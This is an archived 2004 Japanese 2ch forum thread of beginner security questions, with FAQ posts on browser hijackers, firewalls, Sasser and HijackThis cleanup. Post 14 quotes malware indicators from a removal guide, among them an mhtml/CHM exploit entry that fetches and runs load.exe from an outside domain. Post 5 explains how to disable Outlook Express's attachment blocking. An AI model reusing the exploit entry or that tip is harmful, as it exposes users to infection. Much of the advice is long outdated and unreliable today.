2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

セキュリティ初心者質問スレッドpart41

1 :名無しさん@お腹いっぱい。:04/05/12 16:01
セキュリティ関係の質問スレです。
セキュリティ以外の質問は該当する板へ移動して下さい。

<参考>
・分類不明の質問→[PC初心者板] http://pc5.2ch.net/pcqa/
・2ちゃんねる仕様→ http://etc.2ch.net/qa/

<質問前の必須事項>
※以下を無視すると回答してもらえません。

「FAQ/関連リンク確認」>>1-20あたり

「類似質問の検索」
・Googleを利用 →http://www.google.co.jp/
・ページ内検索 →Win:[Ctrl]+[F](Mac:[コマンド]+[F])
・過去ログ/関連スレの検索
→[2chスレッド検索] http://www.ruitomo.com/~gulab/k.html

<質問時の注意>
・OSやソフト名、バージョン、サービスパック適用の有無、
ウィルス対策の有無、接続形態、装置名などを詳しく明示。
(例)「WinXPSP1,IE6SP1使用。ADSL回線でプロバイダは〜。
  〜のルータを導入しているが、〜ができなくなった」等

▼━禁止事項 ━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです

2 :名無しさん@お腹いっぱい。:04/05/12 16:01
【過去ログ】
part40 http://pc5.2ch.net/test/read.cgi/sec/1082207307/
part39 http://pc3.2ch.net/test/read.cgi/sec/1080480132/
part38 http://pc3.2ch.net/test/read.cgi/sec/1078216939/
part37 http://pc.2ch.net/test/read.cgi/sec/1076728395/
part36 http://pc.2ch.net/test/read.cgi/sec/1075135866/
part35 http://pc.2ch.net/test/read.cgi/sec/1072675686/
part34 http://pc.2ch.net/test/read.cgi/sec/1070035602/
part33 http://pc.2ch.net/test/read.cgi/sec/1068471471/
part32 http://pc.2ch.net/test/read.cgi/sec/1066831852/
Part31 http://pc.2ch.net/test/read.cgi/sec/1064799419/
Part30 http://pc.2ch.net/test/read.cgi/sec/1063081161/
Part29 http://pc.2ch.net/test/read.cgi/sec/1061521014/
Part28 http://pc.2ch.net/test/read.cgi/sec/1059642238/
Part27 http://pc.2ch.net/test/read.cgi/sec/1058283714/
Part26 http://pc.2ch.net/test/read.cgi/sec/1056288419/
Part25 http://pc.2ch.net/test/read.cgi/sec/1054458698/
Part24 http://pc.2ch.net/test/read.cgi/sec/1052123602/
Part23 http://pc.2ch.net/test/read.cgi/sec/1050042334/
Part22 http://pc.2ch.net/test/read.cgi/sec/1047648810/
Part21 http://pc.2ch.net/test/read.cgi/sec/1044609731/
Part20 http://pc.2ch.net/test/read.cgi/sec/1042516088/
Part19 http://pc.2ch.net/test/read.cgi/sec/1040876540/
Part18 http://pc.2ch.net/sec/kako/1039/10390/1039053088.html

※Part17以前はPart18の過去ログ一覧を参照
http://pc.2ch.net/test/read.cgi/sec/1039053088/12

3 :名無しさん@お腹いっぱい。:04/05/12 16:02
【お約束】
・ブラウザ
IE5.5SP2かIE6.0SP1を推奨。新しいIEに乗り換えること。
IE 5.5の方はSP2にアップデートの後、各種パッチを適用。
IE以外のNetscapeやOperaを利用する手もあり。

・怪しいメール
開かずに捨てる。IE5.01SP2,IE5.5SP2,IE6.0以上でなく
Outlook Expressを使用している場合、メールクリック時に
感染する場合があるので、プレビュー機能は必ずオフ。

・ウィルス対策ソフト
定期的にパターンファイル(ウィルス定義ファイル)を更新。
感染する前に定期的にウィルスチェック。

・不審なURLの鑑定→ラウンジhttp://ex6.2ch.net/entrance/ へ。
「勇気」「鑑定」 等のキーワードで鑑定スレを検索。

※view-source:http://〜 としてソースを表示させると、
 Javaスクリプト等が実行されないので安全。
※初心者が誤ってクリックしないよう、
 ウィルスやブラクラへ直接リンクを張らないこと。

・リンク先を直接見る
「対象をファイルに保存」→メモ帳で一度開いてみる。

・アダルトサイト対策
[インターネットオプション]-[セキュリティ]タブ
-[インターネット]-[レベルのカスタマイズ]
- ActiveX、JAVA、スクリプトを全て無効

4 :名無しさん@お腹いっぱい。:04/05/12 16:02
【IE(Internet Explorer)】
・IEのスタートページと検索のページが書き換えられた
 1.ウィルス検索。(Trojan.JS.Offensive等の感染がないか)
 2.msconfigかレジストリエディタで不審な常駐ソフトを解除。
 3.[インターネットオプション]-[プログラム]タブ
  -「Webの設定のリセット」-「はい」を実行
 4.PC再起動。

 ※直らなければ、レジストリエディタ起動。書き換えられた
 リンク先を検索し、1つずつ安全なリンク先に書き戻していく。


・アダルトサイト閲覧中のトラブル
 〜デスクトップに怪しいショートカットのアイコンが出現〜
 1.右クリック-[プロパティ]-「リンク先を表示」をクリック。
  表示されたファイルをアイコンとともに削除。
 2.msconfigかレジストリエディタで不審な常駐ソフトを解除。

<参考>
・エロサイト見たら・・・助けてください!
http://pc5.2ch.net/pcqa/
・くだ質FAQ
http://members.tripod.co.jp/nekohako/secfaq.html
・WEBPOPUPからメッセージ貰った人
http://pc5.2ch.net/test/read.cgi/sec/1035271935/l50

5 :名無しさん@お腹いっぱい。:04/05/12 16:03
【OE(=Outlook Express)】
・OEのプレビューをオフ
 [表示]-[レイアウト]-「プレビューウィンドウを表示する」
 のチェックを外す。

・OE6で添付ファイルが開けない
 「添付ファイルは安全でないため……」と表示される。
  [ツール]-[オプション]-[セキュリティ]タブ-「ウイルスの
 可能性がある添付ファイルを保存したり開いたりしない」
 のチェックを外す。

・OE以外のメーラーならウィルスメールを開いても安全か?
 IEコンポーネントを利用してHTMLメールを表示する場合はご用心。

 →[おすすめのメールソフトは何?]スレ参照
 http://pc5.2ch.net/test/read.cgi/software/1075136971/

 OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
 http://pc5.2ch.net/test/read.cgi/sec/1021363841/

 IE6SP1適用済みOE6ならHTMLメールをテキスト形式表示可能
 http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
 http://www.ipa.go.jp/security/txt/2002_10.html

6 :名無しさん@お腹いっぱい。:04/05/12 16:03
【IPアドレス】
・自分のIPアドレスを確認
 9x系:[ファイル名をしてして実行]→winipcfg.exeを実行。
 NT系:コマンドプロント起動→ipconfig /allを実行。

・他人のIPアドレスを確認
 MS-DOSプロンプト(コマンドプロンプト)を起動して、
 netstat -anを実行。表示されたポートから判断。

・IPアドレスから個人情報は漏れるか?
 プロバイダが所有する情報は公権力が無い限り、外部漏洩は
 通常なし。それよりもクラッキング対策をするべき。

・IPアドレスからプロバイダを知りたい
 >>7-10の【Whois】参照。なお、結果を貼りつけても無視される。

【掲示板】
・掲示板荒らし対策
 注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖。
 冷静に判断し、対応。困っているのは貴方だけではない。

・掲示板利用者のIPアドレスは調べられるか?
 HTMLソースに書いてある場合もある。

7 :名無しさん@お腹いっぱい。:04/05/12 16:04
【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Kerio Technologies Inc. | Kerio Personal Firewall
http://www.kerio.com/kpf_home.html
Tiny Personal Firewall http://www.tinysoftware.com/
Agnitum Outpost http://www.agnitum.com/download/outpost1.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322 (リンク切れ)
BlackICE Defender http://blackice.jp/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/ (リンク切れ)
【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.nu/support/download/
【日本語パッチ 等】
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/
Agnitum Outpost(日本語で使用可能)
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm (リンク切れ)

8 :名無しさん@お腹いっぱい。:04/05/12 16:05
【セキュリティ チェックサイト】
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check
http://security.symantec.com/default.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

[ウィルス情報]
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp

9 :名無しさん@お腹いっぱい。:04/05/12 16:05
[Windows板] 広告カットとファイヤーウォールソフ
ト。http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板]
自分のパソコンへの不正侵入対策してますか?2http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオールhttp://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者@2ch掲示板 http://pc5.2ch.net/pcqa/
初級ネットワーク@2ch掲示板 http://pc5.2ch.net/hack/
windows@2ch掲示板 http://pc5.2ch.net/win/
ソフトウェア http://pc5.2ch.net/software/
ダウンロードソフト(download板) http://tmp2.2ch.net/download/
パソコン一般@2ch掲示板 http://pc5.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイトダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.homelinux.org/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)やOpera(オペラ)を使用するという手段があることも念頭にいれてお いてください
http://home.netscape.com/ja/
http://www.jp.opera.com/

10 :名無しさん@お腹いっぱい。:04/05/12 16:06
【ウィルス/ファイアーウォール】
・無料で使えるアンチウイルスソフト
 AVG http://pc5.2ch.net/test/read.cgi/sec/1081426213/l50
 BitDefender Free Edition http://pc5.2ch.net/test/read.cgi/sec/1081557959/l50
 antivir http://pc5.2ch.net/test/read.cgi/sec/1078021321/l50
・ウイルス/スパイウェア/トロイFAQ
 http://members.tripod.co.jp/nekohako/virusfac.html
・ソフトがなければ、オンラインウィルススキャン
 http://www.symantec.com/region/jp/securitycheck/index.html
 http://www.trendmicro.co.jp/hcall/index.asp
(※署名済みActiveXコントロールのダウンロードを有効にすること)

・ウィルス対策ソフトの用語
 「駆除」:ファイルからウィルスを取り除くこと。
 「隔離、検疫」:ファイルをリネーム、移動。実行できなくする。
 「削除」:ファイル自体を削除。ワーム本体は通常、削除される。
・デマウィルス(安全なファイルをウィルスだと言い張る偽情報)
 jdbgmgr.exe、sage.exeなどは全てWindowsのシステムファイル。
 http://www.ipa.go.jp/security/topics/alert140515.html参照。
・webメール:添付ファイルを実行した場合、感染確率大。
 hotmail:ウィルス検査はあるが、新種のウィルス相手には無力。
・MacはWindowsのウィルスに感染するか?
 WindowsのアプリケーションはMacでは通常は実行できないので、
 感染はしない。但し、保菌してMac→Winへ感染する例がある。
・ファイアーウォールがトロイのアクセスをブロックしたが…
 アウトバウンドで検出:感染の可能性高。
 インバウンドで検出:感染の可能性低。念のためにチェック。
 ※たまたまバックドアツールが通常使うポートと同じ場合もある。

11 :名無しさん@お腹いっぱい。:04/05/12 16:06
        / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        | 今だ!10ゲットォオオオオオオ
    \  \
          ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      \ ∧ ∧
        (゚Д゚∩
       ⊂/  ,ノ
 ̄  ̄   「 _  |〜 ウ  ̄  ̄  ̄
       ∪ ヽ l   オ
       /  ∪  \
  /       :    オ
     /    || .   オ  \
     /     | :   オ  \
    /       .
           | .   オ
           | | : .
           |:  .
           || .
            .
            |
           | | : .


12 :名無しさん@お腹いっぱい。:04/05/12 16:06
【緊急】WEB見ててブラウザが変になったらとりあえずこれを実行【処置】
ブラクラ、ジョークソフト、ブラウザジャッカー、スパイウェアなどの迷惑ソフトに
やられた人は落ち着いて以下を実行してください。たぶん8割くらいは解決…
-----------------------------------------------------------------------
  You are visiting PEDO sites!   Click Here To Protect Yourself
-----------------------------------------------------------------------
とか黄色い窓が出る悪質なブラウザハイジャッカーが流行ってます。やられた人は
次レスの【Secure系ブラウザジャッカー喰らったらこれをやれ】も実行してください。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット
4)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
6)「アクセス拒否」ファイルを削除→セーフモード(F8を連打)でOSを起動→削除
7) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
9) ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをダウン→実行
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo →OS再起動
10)定番スパイウェア除去ソフト↓をインストール(併用推奨)
  Ad-Aware http://www.lavasoft.de/ Spybot-S&D http://security.kolla.de/

11)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]
  復元フォルダに悪プログラムが残ったままになるのでアンチウィールスのスキャン
  で警告が出たり、うっかり再度復元して緊急事態に逆戻りしたりwに注意。

13 :名無しさん@お腹いっぱい。:04/05/12 16:07
  .‐'' ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ヽ
  |    ________                       |
  |    |   ∧__∧     |                    |
  |    |  <`∀´ >     |                    |
  |    |_/   二\  |                     |
  |    |_/\  \\) |                    |
  |    |     \  \ |                      |
  |    |    / /\ ̄ ̄ )                |
  |    |   / /    ̄| ̄     非 常 識      |
  |    \ \ \     \                 |
  ゝ、     \ \ \     \              ノ
     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


14 :名無しさん@お腹いっぱい。:04/05/12 16:07
【Secure系ブラウザジャッカー喰らったらこれをやれ】
  ★You are visiting PEDO sites!  Click Here To Protect Yourself★
とか黄色い窓にコケ脅しが出たら、Secure(troj_HARNIG.Aや亜種)喰らってます。
前レスの↑【緊急処置】に加えて次↓を実行しましょう。

12) レジストリ修復ツール HijackThis を↓ここからダウン、
 http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe
 Hjackなど適当な名前のディレクトリに入れる→HijackThis以外のウィンドウをすべて
 閉じる→下記レジストリキーの中で見つかったものにチェックを入れてFix→PCを再起動 
 ★重要★間違って削除したら、窓右下隅のConfig→Backups→復元したい項目を選択→
 Restoreボタンを押す で復元されます。(むやみに削除するとPCが不調になります)
 O4 - HKLM\..\Run: [Reg32] C:\WINDOWS\reg32.exe
 O4 - HKLM\..\Run: [Reg32] C:\WINDOWS\reg33.exe
 O4 - HKLM\..\Run: [Online Secuirity] C:\WINDOWS\svchost.exe
 O4 - HKLM\..\Run: [Dial32] C:\WINDOWS\dl.exe
 O4 - HKLM\..\Run: [Dial33] C:\WINDOWS\dlm.exe
 O4 - HKLM\..\Run: [Cons] C:\WINDOWS\consol32.exe
 O4 - HKLM\..\Run: [Serv] C:\WINDOWS\msstasks.exe
 O4 - HKLM\..\Run: [Upgrade Service] C:\WINDOWS\winupd.exe
 O4 - HKLM\..\Run: [Upgrade Service] C:\WINDOWS\sxchost.exe
 O4 - HKLM\..\Run: [Service Expration] C:\WINDOWS\szchost.exe
 O4 - HKLM\..\Run: [Services Process] C:\WINDOWS\system32\config\services.exe
 O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.
 mht!h ttp:// hard-virgins.com/dl/ms/x.chm::/load.exe

15 :名無しさん@お腹いっぱい。:04/05/12 16:07
13) 仕込まれた悪いファイルの削除:上のHijackThisで見つかったブラウザ
 ジャッカーの本体ファイル(C:\WINDOWS\dlm.exeなど)を検索、削除。システムファイル
 と紛らわしい名前がついてるので、本物を削除しないよう、ファイル名とディレクトリ
 を確認しながら慎重に作業→OS再起動
-------以上実行してまだトラブってたら「ネット関係/セキュリティ板」で質問--------
【正式】ウィルス情報&質問総合スレッド  セキュリティ初心者質問スレッド

16 :名無しさん@お腹いっぱい。:04/05/12 16:08
【HijackThis 利用の基礎知識】
ウィルス、ワーム、スパイ、ブラウザジャッカーなどの悪プログラムはレジストリを改変して、
自分が自動的に実行されたり、削除されても復活したり、IEのホムペをエロサイトにしたり、
仏壇の下の引出しからおばあちゃんの定期預金通帳を持ち出したり好き勝手をします。

Windowsにはregeditというレジストリ編集ツールが付属してますが、膨大なレジストリ項目
の中を探すのが大変だし、間違ったときの復旧処理も面倒です。

HijackThisは悪プログラムが改変しそうな項目をスキャンして表示し、簡単に削除/復旧
するツールです。

1) Hjack(適当な名前でよい)という新しいフォルダを用意する
2) フォルダに本体をダウンロード
  http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe
3) HijackThis以外の窓を全部閉じる
4) 実行→config→Make backups before fixing items にチェックが入ってることを確認
  (左上方、チェックボックスが並んでるところ)→BACKボタンでmainへ戻る
5) Main画面でSCAN→SCANボタンがSave Logボタンに変わる→ボタンを押す→HijackThis
 が存在するディレクトリを選んで実行→ログファイルが作成されメモ帖で開かれる
 (エライ人に相談するときはこのログを貼ってください)
6) トレンドやシマンテックのデータベース、被害対策サイト、2chセキュ板などの情報を
 参考に削除項目を調べる
7) Main画面で削除項目を選択反転→Fix Chekedボタンを押す
8) 間違えて削除した場合は、config→BACKUPS→復元したい項目を選択反転→Restoreボタン

詳しい使い方、LOGの解析方法などは「被害対策」サイトのここら見て勉強してください。
http://higaitaisaku.web.infoseek.co.jp/hijackthis.html

17 :1:04/05/12 16:11
オワタ
テンプレがチト長い

18 :名無しさん@お腹いっぱい。:04/05/12 16:11
おつ

19 :名無しさん@お腹いっぱい。:04/05/12 16:13
モス!

20 :名無しさん@お腹いっぱい。:04/05/12 18:51
質問させてください。
昨日からモデムの接続が頻繁に切れるのですが、これは外部から誰かが侵入してる可能性があるからですか?
回線はADSLでニフティ。業者に障害情報もなく、同じものを使っている近所の友人もそんなことは無いといいます。
OSはWinXPです

21 :名無しさん@お腹いっぱい。:04/05/12 19:01
>>20
近所でつかっていても、場所が変わるだけで接続状況が変わる、ADSLってそんなもん。


22 :名無しさん@お腹いっぱい。:04/05/12 19:29
>>21
2年間使ってきてこんなこと初めてなんですが…

23 :名無しさん@お腹いっぱい。:04/05/12 20:01
・Sasserワームを防御するため、LANとインターネットの境界に設置したファイアウォール
 やルータの設定で、
  UDP135、137、138、139及び445、
  TCP135、138、139、445及び593
 のポートへのアクセスを許可しない。
・Sasserワームの感染源とならないよう、TCP5554、9995、9996のポートへのアクセス
 を許可しない。



↑のポートの設定の仕方をが分らないです・・。
初心者質問板から誘導されてきました


24 :名無しさん@お腹いっぱい。:04/05/12 20:23
>>23
設定に関してはマニュアル読んでもらうしかないんだが、
ルータとファイヤーウォールいれてるなら、わざわざ開けなきゃ
いいだけの話。
ここにいってTCPとUDPであいてるポートがないか
調べてごらん。
ttp://scan.sygatetech.com/pretcpscan.html

25 :名無しさん@お腹いっぱい。:04/05/12 21:12
>>20
パーソナルファイアーウォールソフト使ってる?攻撃されてるならきっとログ残るから。
侵入したのにわざわざ切断させないと思うけど。長いこと居座りたいでしょw
>>24
なんて言うソフト・ルータを使っているか書いたほうが良いとおもわれ。

26 :名無しさん@お腹いっぱい。:04/05/12 21:27
>>25
ノートンインターネットセキュリティでもログ残りますか?

27 :名無しさん@お腹いっぱい。:04/05/12 21:35
ルータのログ

28 :名無しさん@お腹いっぱい。:04/05/12 21:36
モデムってかいてあったな。NISでも残る

29 :名無しさん@お腹いっぱい。:04/05/12 21:45
>>28
ありがとうございました
回線速度が落ちるのでほとんどノートン切ってましたがつけることにします

30 :名無しさん@お腹いっぱい。:04/05/13 03:21
ウイルスチェイサーとマカフィーのファイアウォール入れてる俺は馬鹿ですか?
ファイアウォールがそろそろ更新時期なので。
専門家の罵倒は甘んじてお受けします。
俺が馬鹿なら何故馬鹿なのか教えてください。
よろしくお願いします。

31 :名無しさん@お腹いっぱい。:04/05/13 03:30
なぜ馬鹿だと思う?

32 :名無しさん@お腹いっぱい。:04/05/13 03:45
すみません
あるサイトからhttpsで求人に応募しようとしたのですが
セキュリティ証明書が信頼する会社から発行されていません
とのメッセージがでました

発行者はKSI First Serverとなっているんですが
信頼していいものでしょうか?

よろしくお願いします。

33 :名無しさん@お腹いっぱい。:04/05/13 03:48
>>31
目に止めていただいて恐縮です。
セキュリティーソフトを2つも入れていると話して知人から嘲笑されました。
俺も知識が無いものですから、笑って誤魔化したんですが、ウイルスソフトと
不正アクセス監視ソフトは別物だと思い購入した自信がなくなりました。
俺が馬鹿なら知人とネタにして酒飲みます。
毒にも薬にもならない程度のことなら知人をボコリます。

34 :33:04/05/13 03:50
ウィルスソフト→ウィルスチェックソフトの間違いです。

35 :名無しさん@お腹いっぱい。:04/05/13 04:29
>>33
分かり易く言うとアンチウィルスはウィルスの検出と駆除を行うもので、
ファイアーウォールは外部からの不正侵入、外部への不正発信を防ぐもの。
それぞれ別の機能なので、
アンチウィルス機能のみのウイルスチェイサー(使ったことはないが)と
マカフィーのファイアーウォールソフトを入れるのは正しい使い方。

もっともウィルスバスターやノートンインターネットセキュリティでは
それらの機能を包括して提供しているので、話が少々変わってくるが。

36 :名無しさん@お腹いっぱい。:04/05/13 04:38
当方win2000pro/IE6.sp1使用

昨晩10時頃ネットしてたら
いきなりMS-DOSプロンプトが沢山起動されて
そこにはコマンド(”warez〜”みたいなやつ)が書いてあって・・・
ctrl+alt+delも出来なかったから強制終了。

その後急いでNorton Internet Security導入。。。現在異常無し
(ウィルススキャンも終了ウィルスは無し)

攻撃されたのでしょうか?
詳しい方いらっしゃいますか?

37 :名無しさん@お腹いっぱい。:04/05/13 05:59
>>36
〜みたいなやつと書かれても回答のしようがないし、
ましてや検索して確かめることも出来ない。
WindowsUpdateを行ってNISをインストールしたのなら、
それでひとまず問題なし。

38 :36:04/05/13 06:55
>37
レスありがとうございます。
説明の仕方が悪くてすみませんでした。

突然の無限ループに焦ってしまい
再起動することで頭がいっぱいで
良くコマンドを見ていないんです。。。
ちょっと覚えているのは
”warezサイト(com?)へ接続”と書かれていたって事ぐらいです。。。



39 :名無しさん@お腹いっぱい。:04/05/13 08:05
自己責任


40 :名無しさん@お腹いっぱい。:04/05/13 12:03
4月にブロードバンドルーター入れたらとたんにNISが静かに
なった。それまではトロイの木馬がニュッとかあったのに。
NISアップデートしてるけど、4月から一度も反応なし。

不正進入に関してはルーターかましてればFW不要という事?

41 :名無しさん@お腹いっぱい。:04/05/13 12:13
XP Pro、SP1使用です。
昨日からspoolsv.exeのCPU使用率が、起動時から100%になる現象が起きます。
もちろん他のアプリを立ち上げることすらできなくなります。
OSのシャットダウンもままならなく、電源ボタンを押して終了させている状態です。
ノートンアンチウィルスのスキャンには何も引っかかりませんでした。
コンパネのプリンタの追加も、エラーが出て出来ない状態です。
思い当たるのは、二日前にSasserに引っかかり、駆除をしたことです。

この原因と対策(現在はタスクマネージャーからspoolsv.exeを切ることくらい)が
あれば教えていただきたいと思います。

42 :てんぷれに追加してもいいかも…:04/05/13 12:24
>>33
■セキュリティソフトの相性問題
ファイアウォール、アンチウィルス、アンチスパイについて
同種の常駐ソフトを複数インストールするのは不可。

・複数のFW→確実にバッティング
 NIS、VBのおまけFW、ZoneAlarm、Outpost、Sygate、Kerioなど
 起動しなくてもインストしてあるだけでトラブルのおそれ大
 XPの付属FWは無効にしておくだけで上記製品と衝突しない。
・複数の常駐アンチウィルスソフト→トラブルが起きる可能性大
・複数の常駐アンチスパイソフトト→トラブルが起きる可能性あり

種類が違うセキュソフトはバッティングしない。FW、アンチウィルス、
アンチスパイは併用するのが常識。

常駐ソフトと非常駐ソフトは同種でもバッティングしない。ウィルス
バスターを常駐させているときにAntidoteを導入してスキャンを
かけてもよい。(ただし誤認で警告を出すなどマイナートラブルはある)

アンチウィルス、アンチスパイソフトはそれぞれ一長一短があるので
複数のソフトでスキャンをかける必要が出てくることもある。

NIS、VBはアンチウィルス機能に加えて各種おまけ機能が付加されて
いるためそうとう重い。特にNISはFW機能のみをアンインストールでき
ないので他のFWを利用できないことに注意

43 :名無しさん@お腹いっぱい。:04/05/13 12:50
>>40
兆度素人の考えそうなことだな(w^3

44 :名無しさん@お腹いっぱい。:04/05/13 13:15
>>41
たぶんSasserにやられてクラッシュしたときにspoolsv.exe
ファイルが壊れたんだろう。とりあえず、フリーズを防ぐために、

コントロールパネル→管理ツール→サービス→Print spooler
のプロパティを開き、スタートアップの種類を「無効」にする。

他にも何か壊れてるかもしれないから、暇をみて修復インストール
するのが確実。修復中はLANケーブルを抜いておく。修復が終わったら
・XPのファイアウォールを有効にしてからケーブルをつなぐ
・Windows Updateを実行して「重要な更新」を全部入れる

修復作業を始める前にMSの関連資料をプリントアウトして手元に
置いておくこと。
 修復インストール手順
  http://support.microsoft.com/default.aspx?scid=%2Fdirectory%2Fworldwide%2Fja%2Fkblight%2FT009%2F8%2F00.asp
 Sasser対策
  http://www.microsoft.com/japan/security/incident/sasser.mspx




45 :名無しさん@お腹いっぱい。:04/05/13 13:37
質問させて下さい
ウィルスバスター2004のFWでUDP1900番のポートから30秒置きに1秒〜2秒間に
十数回送信を試みようとします。
現時点ではFWで送信をブロックしてますが気になり
ウィルスオンラインスキャンをトレンドとシマンテックで実施するも反応なし
PCに入れてるバスター2004最新アップデート済みで検索もHITせず
Ad-AwareとSpybotで検索すると40個ほどHITし削除
念のためセーフモードでもう一度検索するもHITせず直ったかなと思いFWのログを見ると送信を続けてる状況です
そして数日してもう一度Ad-AwareとSpybotで検索すると5個と1個HITし削除しました。
それでもまた後日検索でHITするの繰り返しです。
原因が分かりません。

C:\Documents and Settings\知らない人の名前\*****で検出されます。
知らない人の名前=起動時は出てこないです

OS XP 最新アップデート済み


46 :名無しさん@お腹いっぱい。:04/05/13 14:31
1900番はUPnP機器。気にしなくていい。

47 :名無しさん@お腹いっぱい。:04/05/13 14:39
>>46
ありがとうございます
スパイウェアの方はどうでしょうか?

48 :名無しさん@お腹いっぱい。:04/05/13 14:52
>>47
「数日してもう一度」とあるけど、その間ネットには接続してない?
ネット接続をしてるなら普通に拾っただけかも。
ttp://members.at.infoseek.co.jp/tef_tef/trouble/upnp1.html UDP1900について。

49 :名無しさん@お腹いっぱい。:04/05/13 14:56
>>47
知らない人の名前ってAdmで始まってる?
それとスパイウェアの検出名もかいといて。
ファイル名だけでもいいから。
>>45 の情報だけだと手伝いようがない

50 :名無しさん@お腹いっぱい。:04/05/13 15:11
>>48
ネットは接続してますがjaneで2ちゃんが主です
UDP1900番のポートはリンク先参照で対応します
ありがとうございます。

>>49
現在仕事中ですので自宅に帰りしだい検出名、ファイル名を書きます
知らない人の名前は日本語の漢字4文字です。
その名前晒しても問題なければ晒しますが?

51 :名無しさん@お腹いっぱい。:04/05/13 15:27
ってゆーか、ウイルス云々より前に、
自分のPCに知らない名前のユーザがあるのは怖いと思った。

52 :名無しさん@お腹いっぱい。:04/05/13 15:31
Outpostのログをみたら

  アプリケーションの活動を許可する MSMSGS.EXEMSMSGS.EXEbaym-cs330.msgr.hotmail.com1863送信TCP

時々送信してるんですがこのリモホ個人のじゃないですよね?


53 :名無しさん@お腹いっぱい。:04/05/13 15:34
>>50
その名前でググレばなにかでてくるかもw

54 :名無しさん@お腹いっぱい。:04/05/13 15:39
>>53
やってみます

sage進行なのですね
今気づきました
すみません

55 :名無しさん@お腹いっぱい。:04/05/13 17:31
ADSL使用でモデムを切断するたびにIPアドレスが変わるんですが、
一度使ったIPアドレスはいずれ他の誰かが使うことになるのでしょうか?
それともまたいつか自分にまわってくるのでしょうか?

56 :名無しさん@お腹いっぱい。:04/05/13 17:38
>>55
あんたの契約しているプロバイダーが持っているIPアドレス内で、使いまわし。
接続詞に行った時に、空いているもののどれかが割り当てられる。

57 :名無しさん@お腹いっぱい。:04/05/13 17:42
>>45
本当に使っていないユーザーアカウントがあるのなら、フォルダごと削除しちまえよ。
C:\Documents and Settings\知らない人の名前\

58 :名無しさん@お腹いっぱい。:04/05/13 17:48
>>56
ありがとうございました。
ちょっと意外でした^^;

59 :名無しさん@お腹いっぱい。:04/05/13 18:06
>>43
もっと前向きなアドバイスをくれよ

60 :名無しさん@お腹いっぱい。:04/05/13 18:26
すいません
質問させて下さい
先日ウイルスに感染して慌ててノートンの体験版をダウンロードして、駆除したんですが
試用期間が切れました
で、新たに購入しようと思っているんですが

体験版をダウンロードした時からPC起動時にPCから1回だけ変な音が鳴るようになったんですね
で、アンインストールしたら鳴らなくなりました
それ以外は何も不具合はなかったのですが
これはノートンを入れたら普通におこることなんでしょうか?
音の原因がノートンしか考えられないので
少し怖いんです…


61 :名無しさん@お腹いっぱい。:04/05/13 19:07
sasser対策のパッチを当てる方法が分りません
